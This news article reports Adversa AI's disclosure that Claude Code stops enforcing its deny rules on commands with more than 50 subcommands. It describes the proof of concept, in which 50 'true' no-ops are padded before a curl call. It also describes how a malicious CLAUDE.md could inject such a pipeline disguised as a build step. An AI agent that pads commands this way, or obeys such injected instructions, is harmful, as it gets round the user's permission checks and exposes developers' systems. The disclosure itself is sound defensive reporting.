Anthropic's Claude Code coding assistant ignores its own deny rules when given 50+ subcommands, creating a potential security vulnerability that could allow malicious code execution.
A security researcher has discovered that Anthropic's Claude Code coding assistant can bypass its own safety mechanisms when given a sufficiently long chain of commands, potentially allowing malicious code execution through prompt injection attacks.
The Vulnerability: Too Many Commands, Too Few Safeguards
The issue stems from a hard-coded limit in Claude Code's security enforcement system. When the AI agent receives more than 50 subcommands in a single request, it stops automatically enforcing its deny rules and instead asks the user for permission.
This behavior is documented in the source code file bashPermissions.ts, which contains a comment referencing internal Anthropic issue CC-643. The code shows that MAX_SUBCOMMANDS_FOR_SECURITY_CHECK is set to 50, with the assumption that "50 is a generous allowance for legitimate usage."
How the Attack Works
Adversa AI's Red Team demonstrated the vulnerability with a simple proof-of-concept attack. They created a bash command that combined 50 no-op "true" subcommands with a single curl subcommand. Since the total exceeded 50 subcommands, Claude Code asked for authorization instead of denying the potentially risky curl command outright.
This creates an opening for prompt injection attacks. A malicious CLAUDE.md file could instruct the AI to generate a 50+ subcommand pipeline that appears to be a legitimate build process, but actually includes hidden malicious commands.
Real-World Implications
The vulnerability has several concerning implications for developers:
Developer Workflows: Many developers use Claude Code in --dangerously-skip-permissions mode or automatically approve actions during long coding sessions, meaning they might not notice when the agent asks for permission on the 51st subcommand.
CI/CD Pipelines: Continuous integration and deployment systems that run Claude Code in non-interactive mode could be particularly vulnerable, as there's no human to approve or deny the request.
Security Bypass: The deny rules, which are meant to prevent risky actions like network requests via curl, become ineffective when the subcommand threshold is exceeded.
Anthropic's Internal Fix
Ironically, Anthropic has already developed a solution to this problem. The company's source code reveals an internal parser called "tree-sitter" that appears to handle command parsing more securely. However, this fix is not yet available in public builds of Claude Code.
The Adversa team notes that implementing a fix would be straightforward. A simple one-line change in bashPermissions.ts at line 2174, switching the "behavior" key from "ask" to "deny," would address this particular vulnerability.
Security Context
This discovery comes amid growing concerns about AI coding assistants and their security implications. The leak of Claude Code's source code has revealed not only this vulnerability but also how much information Anthropic can collect about users and their systems.
The vulnerability highlights a broader challenge in AI security: balancing usability with safety. While 50 subcommands might seem like a reasonable limit for human-authored commands, it creates an unexpected attack vector when AI models generate command sequences.
Regulatory and Compliance Concerns
Adversa argues that this represents a bug in security policy enforcement code with potential regulatory and compliance implications. Organizations using Claude Code for development work may need to reassess their security policies and consider whether additional safeguards are necessary.
Response and Next Steps
Anthropic did not immediately respond to requests for comment about the vulnerability or plans to implement the internal "tree-sitter" parser in public releases.
For now, developers using Claude Code should be aware of this limitation and consider:
- Avoiding
--dangerously-skip-permissionsmode when possible - Reviewing long command sequences carefully
- Implementing additional security measures in CI/CD pipelines
- Monitoring for updates from Anthropic regarding this vulnerability
The discovery serves as a reminder that AI coding assistants, while powerful tools, still require careful security consideration and cannot be trusted to enforce their own safety rules under all circumstances.


Comments
Please log in or register to join the discussion